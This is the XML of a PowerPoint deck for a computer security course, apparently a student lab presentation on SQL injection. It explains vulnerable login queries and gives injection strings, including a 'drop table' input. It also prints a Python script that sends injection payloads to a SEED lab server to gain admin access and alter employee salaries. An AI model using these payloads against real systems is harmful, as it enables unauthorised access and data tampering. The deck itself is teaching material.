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79" r:id="rId2"/>
    <p:sldId id="380" r:id="rId3"/>
    <p:sldId id="381" r:id="rId4"/>
    <p:sldId id="382" r:id="rId5"/>
    <p:sldId id="383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3CB3E-631F-FB4B-BD11-7523FD4D20B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9178-DD43-9D40-8A5D-604F08F4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14725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/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00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5950" y="877888"/>
            <a:ext cx="5624513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37100" cy="3514725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/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558F-E84B-4B1B-8E1D-CE8DBE33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5FEC1-BC99-7CC6-36DA-371BE9327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3CBB-79FB-88E5-9008-A3DADD6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A648-EB6D-114B-98E9-411E98D9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E5CD-C9A8-3240-AD49-8B5C701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8C2E-404A-EBA7-4C9F-04D3B8CE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6301-3CFC-2639-8398-D07EEC05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EB2B-FABE-6D9C-ADB5-694A0216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F485-CDD1-BF10-2FBE-9B329A7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FC39-78AA-8FA4-143E-0F2E19F0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E3858-E43B-AEF2-7640-61E22BC60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80C63-D0EA-16E0-782E-4F894B05F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D899-B24B-3FF1-BDDB-6E45E7C3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E069-B874-7ED8-A44E-362D0F1B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96B8-FA39-9975-394E-6B9996A2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5181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371600"/>
            <a:ext cx="5181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CIT 380: Securing Computer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1CD12AE-F5CB-4883-8DC9-2879467B7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0D52-1D27-23C7-8D7E-D508AF7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427A-3359-FC62-E849-7D0A8109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CD80-B713-2968-A2FE-B223509A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9FAE-F239-3EB8-E684-A000CC70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AB9C-9D58-E068-48C6-6B66970D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4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FC04-3C5A-20C2-5180-0D694E5E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F781-8230-00C9-02AE-A4181E0E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89EE-EA43-9F89-FD5D-55011A0C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2F88-EF6E-0360-8418-13002D1D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99B8-AC09-4CA4-447A-53EA1D98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B2F9-9E7A-9BE7-DADF-419125E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8788-7330-FA45-F1D7-4198F0A03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05E43-9975-4D62-D797-FE0D745F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76B4-658A-D4CC-9B43-9CCD75E5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950B-210A-E218-887A-D0784E9C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9519E-DA9F-2A35-F41B-165808E8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C9B5-402E-1E14-7A1D-1868058E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602A-48A3-C288-2897-C4CE30FB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9DA13-B741-6047-23D7-E508E718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AB828-6707-7FA3-C2FD-4243A036A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F3C0B-7592-DACA-A1EE-1787BD2A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C869-8E0A-1BD8-631C-EDD7F3D1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EE5CF-CE98-8A94-E6CC-C9937874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39967-C1E0-71B3-1D13-9371E66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A39B-117C-BD17-8DC1-8154041D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702FD-F768-1DA1-FD0E-371D9967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8DAA0-4B7F-BE83-5339-6F1D63F9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A835E-BBBB-963D-3B23-696B3C76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DB14A-7E27-D58A-040C-563CC36E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422A-4E4A-88D8-0606-BECF293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BF1A-88D3-2397-8D15-F9DE888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60EE-546B-506B-2DB5-B6279A71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8606-2D5E-39C5-CF75-93AACF98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DB9B-A462-4FC6-E49C-38648D6B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30141-65A2-C643-D249-A97DDC5D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FA1F-5E17-FF7C-3E00-91F3A0EE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2F899-6D02-4EDA-F78C-8CCBDF16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643-1C33-749B-3178-A5AA4A34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F7ED3-FB11-C11E-7AC6-C44D1DD6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60F3-8DEB-4FA3-B411-FF4B14891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6E4A7-6AAE-9FAC-6740-F50E8C1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04B9-CF28-4E0E-6FD2-D6D254E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92B66-98DF-7194-9A27-D8C31BD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0360-1305-662F-00FD-CCA91C2C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066E-C051-309F-2D50-071CCBF6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7A00-F5EB-988A-501E-3E3CD1510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03EF-655C-0840-A9F4-93AC2F20E0F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1331-58D7-6BB9-9662-8B92C686E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1F9D-43B8-EF33-20B1-CCA2E1A0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ED41-77B6-6B43-BD9D-36F9CD2F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Injection Attack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Many web applications take user input from a form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Often this user input is used literally in the construction of a SQL query submitted to a database. For example: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dirty="0"/>
              <a:t>SELECT user FROM table </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE name = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;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An SQL injection attack involves placing SQL statements in the user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22960883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400" dirty="0"/>
              <a:t>Login Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3400" dirty="0"/>
              <a:t>Query</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3400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4724400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431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Standard query to authenticate users:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>select * from users where user='$usern' AND pwd='$password'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Classic SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Server side code sets variables $username and $passwd from user input to web form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Variables passed to SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>select * from users where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>' AND pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='$passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Special strings can be entered by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>select * from users where user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>' AND pwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Result: access obtained without password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416676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Some improvements …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430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31800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Query modify:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>select user,pwd from users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Result: the entire table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>We can check:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>only one tuple result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>formal correctness of the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>=“M' ; drop table user;”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37126173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SQL Injection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62088"/>
            <a:ext cx="4038600" cy="4557712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sz="2400"/>
              <a:t>App sends form to user.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/>
              <a:t>Attacker submits form with SQL exploit data.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/>
              <a:t>Application builds string with exploit data.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/>
              <a:t>Application sends SQL query to DB.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/>
              <a:t>DB executes query, including exploit, sends data back to application.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sz="2400"/>
              <a:t>Application returns data to user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20486" name="Picture 4" descr="MCj040426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658938"/>
            <a:ext cx="14541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 descr="MCj040415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637088"/>
            <a:ext cx="130175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6319838" y="13160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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20489" name="Firewall"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5913438" y="3643313"/>
            <a:ext cx="19050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42771193 h 21600"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T9" fmla="*/ 485542386 h 21600"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 21600"/>
              <a:gd name="T11" fmla="*/ 485542386 h 21600"/>
              <a:gd name="T12" fmla="*/ 370439640 w 21600"/>
              <a:gd name="T13" fmla="*/ 485542386 h 21600"/>
              <a:gd name="T14" fmla="*/ 370439640 w 21600"/>
              <a:gd name="T15" fmla="*/ 24277119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32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8" descr="MCj0404159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4619626"/>
            <a:ext cx="13017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6118225" y="585946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Web Server</a:t>
            </a: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8589963" y="58531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DB Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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7961313" y="3729038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Firewall</a:t>
            </a:r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 flipH="1">
            <a:off x="6781801" y="3124200"/>
            <a:ext cx="11113" cy="1595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flipV="1">
            <a:off x="7458075" y="5364164"/>
            <a:ext cx="1066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Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="1600200"/>
            <a:ext cx="2209800" cy="1600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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1905000"/>
            <a:ext cx="1143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7924800" y="19050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User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20499" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2438400"/>
            <a:ext cx="11430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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7912100" y="24384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Pass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20501" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8589963" y="1873251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‘ or 1=1--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291506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F4D86-33B8-479F-CDBA-FE570620AD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4084" y="481263"/>
            <a:ext cx="7940842" cy="5690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CA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for the SQL Injection Attack</a:t>
            </a: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the containers are present in the folder named as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SQLInjection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with the DML file.</a:t>
            </a:r>
          </a:p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another folder named scripts in which I have written three scripts with different functionalities such as-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"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Script_get_admin.py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using this script we are inject a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querry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the form on the login page using the username field to get the access as an admin and then the response is getting saved as an html file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"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Script_bobby_get1.py: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script we are editing the salary of the employee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boby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1$ by passing a different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querry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edit profile and then the response is getting saved as an html file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"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Script_all_get_raise_exceptBobby.py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querry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salary of everyone else is getting raised except bobby. And then the response is getting saved as an html file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"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All_at_once.py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script is to do all these functions on a single hit. Basically, it is a merger of all the other three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6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387D2-9640-0B1A-54EF-0BCEDBACB0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68441"/>
            <a:ext cx="6785811" cy="65451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/>
              <a:t>CODE :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>import requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>session=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>requests.Session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hackString1="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>www.seed-server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>unsafe_home.php?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=admin%27+or+%271%3D1&amp;Password="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>res=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>session.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(hackString1)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res.text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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>response.html','w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>') as file: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file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>res.text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hackstring2="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>www.seed-server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>unsafe_edit_backend.php?NickName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=%27%2C+salary%3D123456789+where+eid%21%3D20000%23&amp;Email=&amp;Address=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>PhoneNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=&amp;Password="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>res=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>session.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(hackstring2)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res.text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with open('response2.html','w') as file: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file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>res.text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hackstring3="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>www.seed-server.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>unsafe_edit_backend.php?NickName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=%27%2C+salary%3D1+where+eid%3D20000%23&amp;Email=&amp;Address=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>PhoneNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=&amp;Password="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>res=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>session.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(hackstring3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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res.text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with open('response3.html','w') as file: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file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>res.text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59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699</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>69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SQL Injection Attack</vt:lpstr>
      <vt:lpstr>Login Authentication Query</vt:lpstr>
      <vt:lpstr>Some improvements …</vt:lpstr>
      <vt:lpstr>SQL Injection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Attack</dc:title>
  <dc:creator>Kshitiz Choudhary</dc:creator>
  <cp:lastModifiedBy>Kshitiz Choudhary</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-24T00:30:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-24T00:39:57Z</dcterms:modified>
</cp:coreProperties>
</file>